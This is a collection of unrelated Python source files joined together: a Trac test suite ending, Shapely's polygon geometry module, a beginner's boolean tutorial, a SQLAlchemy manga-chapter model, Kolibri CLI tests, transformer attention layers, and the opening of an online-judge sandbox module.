suite.addTest(TestTicketHistoryDiff())
suite.addTest(TestTicketQueryLinks())
suite.addTest(TestTicketQueryOrClause())
suite.addTest(TestTimelineTicketDetails())
suite.addTest(TestAdminComponent())
suite.addTest(TestAdminComponentDuplicates())
suite.addTest(TestAdminComponentRemoval())
suite.addTest(TestAdminComponentNonRemoval())
suite.addTest(TestAdminComponentDefault())
suite.addTest(TestAdminComponentDetail())
suite.addTest(TestAdminMilestone())
suite.addTest(TestAdminMilestoneSpace())
suite.addTest(TestAdminMilestoneDuplicates())
suite.addTest(TestAdminMilestoneDetail())
suite.addTest(TestAdminMilestoneDue())
suite.addTest(TestAdminMilestoneDetailDue())
suite.addTest(TestAdminMilestoneCompleted())
suite.addTest(TestAdminMilestoneCompletedFuture())
suite.addTest(TestAdminMilestoneRemove())
suite.addTest(TestAdminMilestoneRemoveMulti())
suite.addTest(TestAdminMilestoneNonRemoval())
suite.addTest(TestAdminMilestoneDefault())
suite.addTest(TestAdminPriority())
suite.addTest(TestAdminPriorityModify())
suite.addTest(TestAdminPriorityRemove())
suite.addTest(TestAdminPriorityRemoveMulti())
suite.addTest(TestAdminPriorityNonRemoval())
suite.addTest(TestAdminPriorityDefault())
suite.addTest(TestAdminPriorityDetail())
suite.addTest(TestAdminPriorityRenumber())
suite.addTest(TestAdminPriorityRenumberDup())
suite.addTest(TestAdminResolution())
suite.addTest(TestAdminResolutionDuplicates())
suite.addTest(TestAdminSeverity())
suite.addTest(TestAdminSeverityDuplicates())
suite.addTest(TestAdminType())
suite.addTest(TestAdminTypeDuplicates())
suite.addTest(TestAdminVersion())
suite.addTest(TestAdminVersionDuplicates())
suite.addTest(TestAdminVersionDetail())
suite.addTest(TestAdminVersionDetailTime())
suite.addTest(TestAdminVersionDetailCancel())
suite.addTest(TestAdminVersionRemove())
suite.addTest(TestAdminVersionRemoveMulti())
suite.addTest(TestAdminVersionNonRemoval())
suite.addTest(TestAdminVersionDefault())
suite.addTest(TestNewReport())
suite.addTest(RegressionTestRev5665())
suite.addTest(RegressionTestRev5994())
suite.addTest(RegressionTestTicket4447())
suite.addTest(RegressionTestTicket4630a())
suite.addTest(RegressionTestTicket4630b())
suite.addTest(RegressionTestTicket5022())
suite.addTest(RegressionTestTicket5394a())
suite.addTest(RegressionTestTicket5394b())
suite.addTest(RegressionTestTicket5497prep())
suite.addTest(RegressionTestTicket5497a())
suite.addTest(RegressionTestTicket5497b())
suite.addTest(RegressionTestTicket5497c())
suite.addTest(RegressionTestTicket5497d())
suite.addTest(RegressionTestTicket5602())
suite.addTest(RegressionTestTicket5687())
suite.addTest(RegressionTestTicket5930())
suite.addTest(RegressionTestTicket6048())
suite.addTest(RegressionTestTicket6747())
suite.addTest(RegressionTestTicket6879a())
suite.addTest(RegressionTestTicket6879b())
suite.addTest(RegressionTestTicket6912a())
suite.addTest(RegressionTestTicket6912b())
suite.addTest(RegressionTestTicket8247())
suite.addTest(RegressionTestTicket8861())
suite.addTest(RegressionTestTicket9084())
return suite
if __name__ == '__main__':
unittest.main(defaultTest='functionalSuite')
|
"""Polygons and their linear ring components
"""
from ctypes import c_double, c_void_p, cast, POINTER
from ctypes import ArgumentError
import weakref
from shapely.algorithms.cga import signed_area
from shapely.coords import required
from shapely.geos import lgeos
from shapely.geometry.base import BaseGeometry
from shapely.geometry.linestring import LineString, LineStringAdapter
from shapely.geometry.proxy import PolygonProxy
__all__ = ['Polygon', 'asPolygon', 'LinearRing', 'asLinearRing']
class LinearRing(LineString):
"""
A closed one-dimensional feature comprising one or more line segments
A LinearRing that crosses itself or touches itself at a single point is
invalid and operations on it may fail.
"""
def __init__(self, coordinates=None):
"""
Parameters
----------
coordinates : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples
Rings are implicitly closed. There is no need to specific a final
coordinate pair identical to the first.
Example
-------
Construct a square ring.
>>> ring = LinearRing( ((0, 0), (0, 1), (1 ,1 ), (1 , 0)) )
>>> ring.is_closed
True
>>> ring.length
4.0
"""
BaseGeometry.__init__(self)
if coordinates is not None:
self._set_coords(coordinates)
@property
def __geo_interface__(self):
return {
'type': 'LinearRing',
'coordinates': tuple(self.coords)
}
# Coordinate access
_get_coords = BaseGeometry._get_coords
def _set_coords(self, coordinates):
self.empty()
self._geom, self._ndim = geos_linearring_from_py(coordinates)
coords = property(_get_coords, _set_coords)
@property
def is_ccw(self):
"""True is the ring is oriented counter clock-wise"""
return bool(self.impl['is_ccw'](self))
@property
def is_simple(self):
"""True if the geometry is simple, meaning that any self-intersections
are only at boundary points, else False"""
return LineString(self).is_simple
class LinearRingAdapter(LineStringAdapter):
__p__ = None
def __init__(self, context):
self.context = context
self.factory = geos_linearring_from_py
@property
def __geo_interface__(self):
return {
'type': 'LinearRing',
'coordinates': tuple(self.coords)
}
coords = property(BaseGeometry._get_coords)
def asLinearRing(context):
"""Adapt an object to the LinearRing interface"""
return LinearRingAdapter(context)
class InteriorRingSequence(object):
_factory = None
_geom = None
__p__ = None
_ndim = None
_index = 0
_length = 0
__rings__ = None
_gtag = None
def __init__(self, parent):
self.__p__ = parent
self._geom = parent._geom
self._ndim = parent._ndim
def __iter__(self):
self._index = 0
self._length = self.__len__()
return self
def next(self):
if self._index < self._length:
ring = self._get_ring(self._index)
self._index += 1
return ring
else:
raise StopIteration
def __len__(self):
return lgeos.GEOSGetNumInteriorRings(self._geom)
def __getitem__(self, key):
m = self.__len__()
if isinstance(key, int):
if key + m < 0 or key >= m:
raise IndexError("index out of range")
if key < 0:
i = m + key
else:
i = key
return self._get_ring(i)
elif isinstance(key, slice):
res = []
start, stop, stride = key.indices(m)
for i in xrange(start, stop, stride):
res.append(self._get_ring(i))
return res
else:
raise TypeError("key must be an index or slice")
@property
def _longest(self):
max = 0
for g in iter(self):
l = len(g.coords)
if l > max:
max = l
def gtag(self):
return hash(repr(self.__p__))
def _get_ring(self, i):
gtag = self.gtag()
if gtag != self._gtag:
self.__rings__ = {}
if i not in self.__rings__:
g = lgeos.GEOSGetInteriorRingN(self._geom, i)
ring = LinearRing()
ring.__geom__ = g
ring.__p__ = self
ring._owned = True
ring._ndim = self._ndim
self.__rings__[i] = weakref.ref(ring)
return self.__rings__[i]()
class Polygon(BaseGeometry):
"""
A two-dimensional figure bounded by a linear ring
A polygon has a non-zero area. It may have one or more negative-space
"holes" which are also bounded by linear rings. If any rings cross each
other, the feature is invalid and operations on it may fail.
Attributes
----------
exterior : LinearRing
The ring which bounds the positive space of the polygon.
interiors : sequence
A sequence of rings which bound all existing holes.
"""
_exterior = None
_interiors = []
_ndim = 2
def __init__(self, shell=None, holes=None):
"""
Parameters
----------
shell : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples
holes : sequence
A sequence of objects which satisfy the same requirements as the
shell parameters above
Example
-------
Create a square polygon with no holes
>>> coords = ((0., 0.), (0., 1.), (1., 1.), (1., 0.), (0., 0.))
>>> polygon = Polygon(coords)
>>> polygon.area
1.0
"""
BaseGeometry.__init__(self)
if shell is not None:
self._geom, self._ndim = geos_polygon_from_py(shell, holes)
@property
def exterior(self):
if self.is_empty:
return None
elif self._exterior is None or self._exterior() is None:
g = lgeos.GEOSGetExteriorRing(self._geom)
ring = LinearRing()
ring.__geom__ = g
ring.__p__ = self
ring._owned = True
ring._ndim = self._ndim
self._exterior = weakref.ref(ring)
return self._exterior()
@property
def interiors(self):
if self.is_empty:
return []
return InteriorRingSequence(self)
@property
def ctypes(self):
if not self._ctypes_data:
self._ctypes_data = self.exterior.ctypes
return self._ctypes_data
@property
def __array_interface__(self):
raise NotImplementedError(
"A polygon does not itself provide the array interface. Its rings do.")
def _get_coords(self):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
def _set_coords(self, ob):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
@property
def coords(self):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
@property
def __geo_interface__(self):
coords = [tuple(self.exterior.coords)]
for hole in self.interiors:
coords.append(tuple(hole.coords))
return {
'type': 'Polygon',
'coordinates': tuple(coords)
}
class PolygonAdapter(PolygonProxy, Polygon):
def __init__(self, shell, holes=None):
self.shell = shell
self.holes = holes
self.context = (shell, holes)
self.factory = geos_polygon_from_py
@property
def _ndim(self):
try:
# From array protocol
array = self.shell.__array_interface__
n = array['shape'][1]
assert n == 2 or n == 3
return n
except AttributeError:
# Fall back on list
return len(self.shell[0])
def asPolygon(shell, holes=None):
"""Adapt objects to the Polygon interface"""
return PolygonAdapter(shell, holes)
def orient(polygon, sign=1.0):
s = float(sign)
rings = []
ring = polygon.exterior
if signed_area(ring)/s >= 0.0:
rings.append(ring)
else:
rings.append(list(ring.coords)[::-1])
for ring in polygon.interiors:
if signed_area(ring)/s <= 0.0:
rings.append(ring)
else:
rings.append(list(ring.coords)[::-1])
return Polygon(rings[0], rings[1:])
def geos_linearring_from_py(ob, update_geom=None, update_ndim=0):
# If numpy is present, we use numpy.require to ensure that we have a
# C-continguous array that owns its data. View data will be copied.
ob = required(ob)
try:
# From array protocol
array = ob.__array_interface__
assert len(array['shape']) == 2
m = array['shape'][0]
n = array['shape'][1]
if m < 3:
raise ValueError(
"A LinearRing must have at least 3 coordinate tuples")
assert n == 2 or n == 3
# Make pointer to the coordinate array
if isinstance(array['data'], tuple):
# numpy tuple (addr, read-only)
cp = cast(array['data'][0], POINTER(c_double))
else:
cp = array['data']
# Add closing coordinates to sequence?
if cp[0] != cp[m*n-n] or cp[1] != cp[m*n-n+1]:
M = m + 1
else:
M = m
# Create a coordinate sequence
if update_geom is not None:
cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
if n != update_ndim:
raise ValueError(
"Wrong coordinate dimensions; this geometry has dimensions: %d" \
% update_ndim)
else:
cs = lgeos.GEOSCoordSeq_create(M, n)
# add to coordinate sequence
for i in xrange(m):
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, i, cp[n*i])
lgeos.GEOSCoordSeq_setY(cs, i, cp[n*i+1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, i, cp[n*i+2])
# Add closing coordinates to sequence?
if M > m:
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, M-1, cp[0])
lgeos.GEOSCoordSeq_setY(cs, M-1, cp[1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, M-1, cp[2])
except AttributeError:
# Fall back on list
m = len(ob)
n = len(ob[0])
if m < 3:
raise ValueError(
"A LinearRing must have at least 3 coordinate tuples")
assert (n == 2 or n == 3)
# Add closing coordinates if not provided
if m == 3 or ob[0][0] != ob[-1][0] or ob[0][1] != ob[-1][1]:
M = m + 1
else:
M = m
# Create a coordinate sequence
if update_geom is not None:
cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
if n != update_ndim:
raise ValueError(
"Wrong coordinate dimensions; this geometry has dimensions: %d" \
% update_ndim)
else:
cs = lgeos.GEOSCoordSeq_create(M, n)
# add to coordinate sequence
for i in xrange(m):
coords = ob[i]
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, i, coords[0])
lgeos.GEOSCoordSeq_setY(cs, i, coords[1])
if n == 3:
try:
lgeos.GEOSCoordSeq_setZ(cs, i, coords[2])
except IndexError:
raise ValueError("Inconsistent coordinate dimensionality")
# Add closing coordinates to sequence?
if M > m:
coords = ob[0]
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, M-1, coords[0])
lgeos.GEOSCoordSeq_setY(cs, M-1, coords[1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, M-1, coords[2])
if update_geom is not None:
return None
else:
return lgeos.GEOSGeom_createLinearRing(cs), n
def update_linearring_from_py(geom, ob):
geos_linearring_from_py(ob, geom._geom, geom._ndim)
def geos_polygon_from_py(shell, holes=None):
if shell is not None:
geos_shell, ndim = geos_linearring_from_py(shell)
if holes:
ob = holes
L = len(ob)
exemplar = ob[0]
try:
N = len(exemplar[0])
except TypeError:
N = exemplar._ndim
assert L >= 1
assert N == 2 or N == 3
# Array of pointers to ring geometries
geos_holes = (c_void_p * L)()
# add to coordinate sequence
for l in xrange(L):
geom, ndim = geos_linearring_from_py(ob[l])
geos_holes[l] = cast(geom, c_void_p)
else:
geos_holes = POINTER(c_void_p)()
L = 0
return (
lgeos.GEOSGeom_createPolygon(
c_void_p(geos_shell),
geos_holes,
L
),
ndim
)
# Test runner
def _test():
import doctest
doctest.testmod()
if __name__ == "__main__":
_test()
|
x=2
print(x == 2)
print(x == 3)
print(x<3)
#Boolean operators
name = "John"
age = 23
if name == "John" and age == 23:
print("Your name is John, and you are also 23 years old.")
if name == "John" or name == "Rick":
print("Your name is either John or Rick.")
# in operator
#The "in" operator could be used to check if a specified object exists within an iterable object container, such as a list:
mylist=["John","Rick"]
if name in mylist:
print("You are here with us")
# if else statement block in python
x=3
if(x==2):
print("x is 2")
elif(x==3):
print("x is 3")
else:
print("value doesnot match")
|
from . import Base
from sqlalchemy import Column, Integer, Text, DateTime, ForeignKey
from datetime import datetime
class Chapter(Base):
__tablename__ = "chapters"
id = Column(Integer, primary_key=True, autoincrement=True)
manga_id = Column(Integer, ForeignKey("manga.id"))
chapter_no = Column(Integer)
chapter_postfix = Column(Text)
ordinal = Column(Integer)
page_count = Column(Integer)
title = Column(Text)
version = Column(Integer)
language_id = Column(Text)
group_id = Column(Integer)
date_added = Column(DateTime)
ipfs_link = Column(Text)
def to_dict(self):
return {
"id" : self.id,
"manga_id" : self.manga_id,
"chapter_no" : self.chapter_no,
"chapter_postfix" : self.chapter_postfix,
"ordinal" : self.ordinal,
"title" : self.title,
"page_count" : self.page_count,
"version" : self.version,
"language_id" : self.language_id,
"group_id" : self.group_id,
"date_added" : int(self.date_added.timestamp()),
"ipfs_link" : self.ipfs_link
}
|
from systems.plugins.index import BaseProvider
import re
import shlex
class Provider(BaseProvider('task', 'command')):
def execute(self, results, params):
env = self._env_vars(params)
stdin = params.pop('input', self.field_input)
cwd = params.pop('cwd', self.field_cwd)
display = params.pop('display', self.field_display)
options = self._merge_options(self.field_options, params, self.field_lock)
command = self._interpolate(self.field_command, options)
if self.field_sudo:
command = 'sudo ' + command[0]
else:
command = command[0]
self.command.sh(shlex.split(command),
input = stdin,
display = display,
env = env,
cwd = cwd
)
|
"""
Tests for `kolibri.utils.cli` module.
"""
from __future__ import absolute_import
from __future__ import print_function
import logging
import os
import tempfile
import pytest
from django.db.utils import OperationalError
from mock import patch
import kolibri
from kolibri.plugins.utils import autoremove_unavailable_plugins
from kolibri.utils import cli
from kolibri.utils import options
logger = logging.getLogger(__name__)
LOG_LOGGER = []
def log_logger(logger_instance, LEVEL, msg, args, **kwargs):
"""
Monkeypatching for logging.Logger._log to scoop up log messages if we wanna
test something specific was logged.
"""
LOG_LOGGER.append((LEVEL, msg))
# Call the original function
logger_instance.__log(LEVEL, msg, args, **kwargs)
def activate_log_logger(monkeypatch):
"""
Activates logging everything to ``LOG_LOGGER`` with the monkeypatch pattern
of py.test (test accepts a ``monkeypatch`` argument)
"""
monkeypatch.setattr(logging.Logger, "__log", logging.Logger._log, raising=False)
monkeypatch.setattr(logging.Logger, "_log", log_logger)
@pytest.fixture
def plugins():
from kolibri import plugins
_, config_file = tempfile.mkstemp(suffix="json")
old_config_file = plugins.conf_file
plugins.conf_file = config_file
plugins.config.set_defaults()
yield plugins
plugins.conf_file = old_config_file
def test_bogus_plugin_autoremove(plugins):
"""
Checks that a plugin is auto-removed when it cannot be imported
"""
plugin_name = "giraffe.horse"
plugins.config["INSTALLED_PLUGINS"].add(plugin_name)
plugins.config.save()
autoremove_unavailable_plugins()
assert plugin_name not in plugins.config["INSTALLED_PLUGINS"]
def test_bogus_plugin_autoremove_no_path(plugins):
"""
Checks that a plugin without a dotted path is also auto-removed
"""
plugin_name = "giraffehorse"
plugins.config["INSTALLED_PLUGINS"].add(plugin_name)
plugins.config.save()
autoremove_unavailable_plugins()
assert plugin_name not in plugins.config["INSTALLED_PLUGINS"]
def test_bogus_plugin_disable(plugins):
installed_apps_before = plugins.config["INSTALLED_PLUGINS"].copy()
disabled_apps_before = plugins.config["DISABLED_PLUGINS"].copy()
try:
cli.disable.callback(("i_do_not_exist",), False)
except Exception:
pass
assert installed_apps_before == plugins.config["INSTALLED_PLUGINS"]
assert disabled_apps_before == plugins.config["DISABLED_PLUGINS"]
def test_plugin_cannot_be_imported_disable(plugins):
"""
A plugin may be in plugins.config['INSTALLED_PLUGINS'] but broken or uninstalled
"""
plugin_name = "giraffe.horse"
plugins.config["INSTALLED_PLUGINS"].add(plugin_name)
plugins.config.save()
try:
cli.disable.callback((plugin_name,), False)
except Exception:
pass
assert plugin_name not in plugins.config["INSTALLED_PLUGINS"]
# We also don't want to endlessly add cruft to the disabled apps
assert plugin_name not in plugins.config["DISABLED_PLUGINS"]
def test_real_plugin_disable(plugins):
installed_apps_before = plugins.config["INSTALLED_PLUGINS"].copy()
test_plugin = "kolibri.plugins.media_player"
assert test_plugin in installed_apps_before
# Because RIP example plugin
cli.disable.callback((test_plugin,), False)
assert test_plugin not in plugins.config["INSTALLED_PLUGINS"]
assert test_plugin in plugins.config["DISABLED_PLUGINS"]
def test_real_plugin_disable_twice(plugins):
installed_apps_before = plugins.config["INSTALLED_PLUGINS"].copy()
test_plugin = "kolibri.plugins.media_player"
assert test_plugin in installed_apps_before
cli.disable.callback((test_plugin,), False)
assert test_plugin not in plugins.config.ACTIVE_PLUGINS
assert test_plugin not in plugins.config["INSTALLED_PLUGINS"]
assert test_plugin in plugins.config["DISABLED_PLUGINS"]
installed_apps_before = plugins.config["INSTALLED_PLUGINS"].copy()
cli.disable.callback((test_plugin,), False)
assert test_plugin not in plugins.config.ACTIVE_PLUGINS
assert test_plugin not in plugins.config["INSTALLED_PLUGINS"]
assert test_plugin in plugins.config["DISABLED_PLUGINS"]
def test_plugin_with_no_plugin_class(plugins):
"""
Expected behavior is that nothing blows up with exceptions, user just gets
a warning and nothing is enabled or changed in the configuration.
"""
# For fun, we pass in a system library
installed_apps_before = plugins.config["INSTALLED_PLUGINS"].copy()
try:
cli.enable.callback(("os.path",), False)
except Exception:
pass
assert installed_apps_before == plugins.config["INSTALLED_PLUGINS"]
@pytest.mark.django_db
def test_kolibri_listen_port_env(monkeypatch):
"""
Starts and stops the server, mocking the actual server.start()
Checks that the correct fallback port is used from the environment.
"""
with patch("django.core.management.call_command"), patch(
"kolibri.utils.server.start"
) as start:
from kolibri.utils import server
def start_mock(port, *args, **kwargs):
assert port == test_port
try:
os.remove(server.STARTUP_LOCK)
except OSError:
pass
activate_log_logger(monkeypatch)
start.side_effect = start_mock
test_port = 1234
os.environ["KOLIBRI_HTTP_PORT"] = str(test_port)
# force a reload of plugins.OPTIONS so the environment variable will be read in
from kolibri.utils import conf
conf.OPTIONS.update(options.read_options_file(conf.KOLIBRI_HOME))
cli.start.callback(test_port, False)
with pytest.raises(SystemExit) as excinfo:
cli.stop.callback()
assert excinfo.code == 0
# Stop the server AGAIN, asserting that we can call the stop command
# on an already stopped server and will be gracefully informed about
# it.
with pytest.raises(SystemExit) as excinfo:
cli.stop.callback()
assert excinfo.code == 0
assert "Already stopped" in LOG_LOGGER[-1][1]
def status_starting_up():
raise server.NotRunning(server.STATUS_STARTING_UP)
# Ensure that if a server is reported to be 'starting up', it doesn't
# get killed while doing that.
monkeypatch.setattr(server, "get_status", status_starting_up)
with pytest.raises(SystemExit) as excinfo:
cli.stop.callback()
assert excinfo.code == server.STATUS_STARTING_UP
assert "Not stopped" in LOG_LOGGER[-1][1]
@pytest.mark.django_db
@patch("kolibri.utils.cli.get_version", return_value="")
@patch("kolibri.utils.cli.update")
@patch("kolibri.utils.cli.plugin.callback")
@patch("kolibri.core.deviceadmin.utils.dbbackup")
def test_first_run(dbbackup, plugin, update, get_version):
"""
Tests that the first_run() function performs as expected
"""
cli.initialize()
update.assert_called_once()
dbbackup.assert_not_called()
# Check that it got called for each default plugin
from kolibri import plugins
assert set(plugins.config["INSTALLED_PLUGINS"]) == set(plugins.DEFAULT_PLUGINS)
@pytest.mark.django_db
@patch("kolibri.utils.cli.get_version", return_value="0.0.1")
@patch("kolibri.utils.cli.update")
def test_update(update, get_version):
"""
Tests that update() function performs as expected
"""
cli.initialize()
update.assert_called_once()
@pytest.mark.django_db
@patch("kolibri.utils.cli.get_version", return_value="0.0.1")
def test_update_exits_if_running(get_version):
"""
Tests that update() function performs as expected
"""
with patch("kolibri.utils.cli.server.get_status"):
try:
cli.initialize()
pytest.fail("Update did not exit when Kolibri was already running")
except SystemExit:
pass
@pytest.mark.django_db
def test_version_updated():
"""
Tests our db backup logic: version_updated gets any change, backup gets only non-dev changes
"""
assert cli.version_updated("0.10.0", "0.10.1")
assert not cli.version_updated("0.10.0", "0.10.0")
assert not cli.should_back_up("0.10.0-dev0", "")
assert not cli.should_back_up("0.10.0-dev0", "0.10.0")
assert not cli.should_back_up("0.10.0", "0.10.0-dev0")
assert not cli.should_back_up("0.10.0-dev0", "0.10.0-dev0")
@pytest.mark.django_db
@patch("kolibri.utils.cli.get_version", return_value=kolibri.__version__)
@patch("kolibri.utils.cli.update")
@patch("kolibri.core.deviceadmin.utils.dbbackup")
def test_update_no_version_change(dbbackup, update, get_version):
"""
Tests that when the version doesn't change, we are not doing things we
shouldn't
"""
cli.initialize()
update.assert_not_called()
dbbackup.assert_not_called()
def test_cli_usage():
# Test the -h
with pytest.raises(SystemExit) as excinfo:
cli.main("-h")
assert excinfo.code == 0
with pytest.raises(SystemExit) as excinfo:
cli.main("--version")
assert excinfo.code == 0
@patch("kolibri.utils.cli.click.echo")
def test_list_plugins(echo_mock, plugins):
cli.list.callback()
test_plugin = "kolibri.plugins.media_player"
any(
map(
lambda x: test_plugin in x[0] and "ENABLED" in x[0],
echo_mock.call_args_list,
)
)
@patch("kolibri.utils.cli.click.echo")
def test_list_plugins_disabled(echo_mock, plugins):
cli.list.callback()
test_plugin = "kolibri.plugins.media_player"
cli.disable.callback((test_plugin,), False)
any(
map(
lambda x: test_plugin in x[0] and "DISABLED" in x[0],
echo_mock.call_args_list,
)
)
@patch("kolibri.utils.cli._migrate_databases")
@patch("kolibri.utils.cli.version_updated")
def test_migrate_if_unmigrated(version_updated, _migrate_databases):
# No matter what, ensure that version_updated returns False
version_updated.return_value = False
from morango.models import InstanceIDModel
with patch.object(
InstanceIDModel, "get_or_create_current_instance"
) as get_or_create_current_instance:
get_or_create_current_instance.side_effect = OperationalError("Test")
cli.initialize()
_migrate_databases.assert_called_once()
|
class Person:
name='zhangsan'
age=20
p = Person()
print(p) # <__main__.Person object at 0x10073e668>
print('⭐️ ' * 20)
class Stu:
name='zhangsan'
age=20
def __str__(self):
return "name: %s; age: %d"%(self.name, self.age)
s = Stu()
print(s) # name: zhangsan; age: 20
|
""" Define the sublayers in encoder/decoder layer """
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
class ScaledDotProductAttention(nn.Module):
""" Scaled Dot-Product Attention """
def __init__(self, temperature, attn_dropout=0.1):
super().__init__()
self.temperature = temperature
def forward(self, q, k, v, mask=None):
# Scale based on the current shape
attn = torch.matmul(q / (q.shape[-1] ** 0.5), k.transpose(2, 3))
if mask is not None:
attn = attn.masked_fill(mask == 0, -1e9)
attn = F.softmax(attn, dim=-1)
output = torch.matmul(attn, v)
return output, attn
class MultiHeadAttention(nn.Module):
""" Multi-Head Attention module """
def __init__(self, n_head, d_model, d_k, d_v, dropout=0.1):
super().__init__()
self.n_head = n_head
self.d_k = d_k
self.d_v = d_v
self.w_qs = nn.Linear(d_model, n_head * d_k, bias=False)
self.w_ks = nn.Linear(d_model, n_head * d_k, bias=False)
self.w_vs = nn.Linear(d_model, n_head * d_v, bias=False)
self.fc = nn.Linear(n_head * d_v, d_model, bias=False)
self.attention = ScaledDotProductAttention(temperature=d_k ** 0.5)
self.dropout = nn.Dropout(dropout)
self.layer_norm = nn.LayerNorm(d_model, eps=1e-6)
def forward(self, q, k, v, mask=None):
d_k, d_v, n_head = self.d_k, self.d_v, self.n_head
sz_b, len_q, len_k, len_v = q.size(0), q.size(1), k.size(1), v.size(1)
residual = q
# Pass through the pre-attention projection: b x lq x (n*dv)
# Separate different heads: b x lq x n x dv
q = self.w_qs(q).view(sz_b, len_q, n_head, d_k)
k = self.w_ks(k).view(sz_b, len_k, n_head, d_k)
v = self.w_vs(v).view(sz_b, len_v, n_head, d_v)
# Transpose for attention dot product: b x n x lq x dv
q, k, v = q.transpose(1, 2), k.transpose(1, 2), v.transpose(1, 2)
if mask is not None:
mask = mask.unsqueeze(1) # For head axis broadcasting.
q, attn = self.attention(q, k, v, mask=mask)
# Transpose to move the head dimension back: b x lq x n x dv
# Combine the last two dimensions to concatenate all the heads together: b x lq x (n*dv)
q = q.transpose(1, 2).contiguous().view(sz_b, len_q, -1)
q = self.dropout(self.fc(q))
q += residual
q = self.layer_norm(q)
return q, attn
class PositionwiseFeedForward(nn.Module):
""" A two-feed-forward-layer module """
def __init__(self, d_in, d_hid, dropout=0.1):
super().__init__()
self.w_1 = nn.Linear(d_in, d_hid) # position-wise
self.w_2 = nn.Linear(d_hid, d_in) # position-wise
self.layer_norm = nn.LayerNorm(d_in, eps=1e-6)
self.dropout = nn.Dropout(dropout)
def forward(self, x):
residual = x
x = self.w_2(F.relu(self.w_1(x)))
x = self.dropout(x)
x += residual
x = self.layer_norm(x)
return x
|
'''Standard challenge module.'''
import os
import shutil
import fcntl
from cffi import FFI
from tornado import gen, concurrent, process
from tornado.stack_context import StackContext
from tornado.ioloop import IOLoop
import PyExt
import Privilege
import Config
from Utils import FileUtils
STATUS_NONE = 0
STATUS_AC = 1
STATUS_WA = 2
STATUS_RE = 3
STATUS_TLE = 4
STATUS_MLE = 5
STATUS_CE = 6
STATUS_ERR = 7
MS_BIND = 4096
class StdChal:
'''Standard challenge.
Static attributes:
last_uniqid (int): Last ID.
last_standard_uid (int): Last UID for standard tasks.
last_restrict_uid (int): Last UID for restricted tasks.
null_fd (int): File descriptor of /dev/null.
build_cache (dict): Cache information of builds.
build_cache_refcount (dict): Refcount of build caches.
Attributes:
uniqid (int): Unique ID.
code_path (string): Code path.
res_path (string): Resource path.
comp_typ (string): Type of compile.
judge_typ (string): Type of judge.
test_list ([dict]): Test parameter lists.
metadata (dict): Metadata for judge.
chal_id (int): Challenge ID.
chal_path (string): Challenge path.
'''
last_uniqid = 0
last_standard_uid = Config.CONTAINER_STANDARD_UID_BASE
last_restrict_uid = Config.CONTAINER_RESTRICT_UID_BASE
null_fd = None
@staticmethod
def init():
'''Initialize the module.'''
with StackContext(Privilege.fileaccess):
try:
shutil.rmtree('container/standard/home')
except FileNotFoundError:
pass
os.mkdir('container/standard/home', mode=0o771)
try:
shutil.rmtree('container/standard/cache')
except FileNotFoundError:
pass
os.mkdir('container/standard/cache', mode=0o771)
ffi = FFI()
ffi.cdef('''int mount(const char source[], const char target[],
const char filesystemtype[], unsigned long mountflags,
const void *data);''')
ffi.cdef('''int umount(const char *target);''')
libc = ffi.dlopen('libc.so.6')
with StackContext(Privilege.fullaccess):
libc.umount(b'container/standard/dev')
libc.mount(b'/dev', b'container/standard/dev', b'', MS_BIND, \
ffi.NULL)
StdChal.null_fd = os.open('/dev/null', os.O_RDWR | os.O_CLOEXEC)
StdChal.build_cache = {}
StdChal.build_cache_refcount = {}
@staticmethod
def get_standard_ugid():
'''Generate standard UID/GID.
Returns:
(int, int): Standard UID/GID
'''
StdChal.last_standard_uid += 1
return (StdChal.last_standard_uid, StdChal.last_standard_uid)
@staticmethod
def get_restrict_ugid():
'''Generate restrict UID/GID.
Returns:
(int, int): Restrict UID/GID
'''
StdChal.last_restrict_uid += 1
return (StdChal.last_restrict_uid, StdChal.last_restrict_uid)
@staticmethod
def build_cache_find(res_path):
'''Get build cache.
Args:
res_path (string): Resource path.
Returns:
(string, int): (cache hash, GID) or None if not found.
'''
try:
return StdChal.build_cache[res_path]
except KeyError:
return None
@staticmethod
def build_cache_update(res_path, cache_hash, gid):
'''Update build cache.
Args:
res_path (string): Resource path.
cache_hash (int): Cache hash.
gid (int): GID.
Returns:
None
'''
ret = StdChal.build_cache_find(res_path)
if ret is not None:
StdChal.build_cache_decref(ret[0])
del StdChal.build_cache[res_path]
StdChal.build_cache[res_path] = (cache_hash, gid)
StdChal.build_cache_refcount[cache_hash] = 1
@staticmethod
def build_cache_incref(cache_hash):
'''Increment the refcount of the build cache.
Args:
cache_hash (int): Cache hash.
Returns:
None
'''
StdChal.build_cache_refcount[cache_hash] += 1
@staticmethod
def build_cache_decref(cache_hash):
'''Decrement the refcount of the build cache.
Delete the build cache if the refcount = 0.
Args:
cache_hash (int): Cache hash.
Returns:
None
'''
StdChal.build_cache_refcount[cache_hash] -= 1
if StdChal.build_cache_refcount[cache_hash] == 0:
with StackContext(Privilege.fileaccess):
shutil.rmtree('container/standard/cache/%x'%cache_hash)
def __init__(self, chal_id, code_path, comp_typ, judge_typ, res_path, \
test_list, metadata):
'''Initialize.
Args:
chal_id (int): Challenge ID.
code_path (string): Code path.
comp_typ (string): Type of compile.
judge_typ (string): Type of judge.
res_path (string): Resource path.
test_list ([dict]): Test parameter lists.
metadata (dict): Metadata for judge.
'''
StdChal.last_uniqid += 1
self.uniqid = StdChal.last_uniqid
self.code_path = code_path
self.res_path = res_path
self.comp_typ = comp_typ
self.judge_typ = judge_typ
self.test_list = test_list
self.metadata = metadata
self.chal_id = chal_id
self.chal_path = None
StdChal.last_standard_uid += 1
self.compile_uid, self.compile_gid = StdChal.get_standard_ugid()
@gen.coroutine
def prefetch(self):
'''Prefetch files.'''
path_set = set([self.code_path])
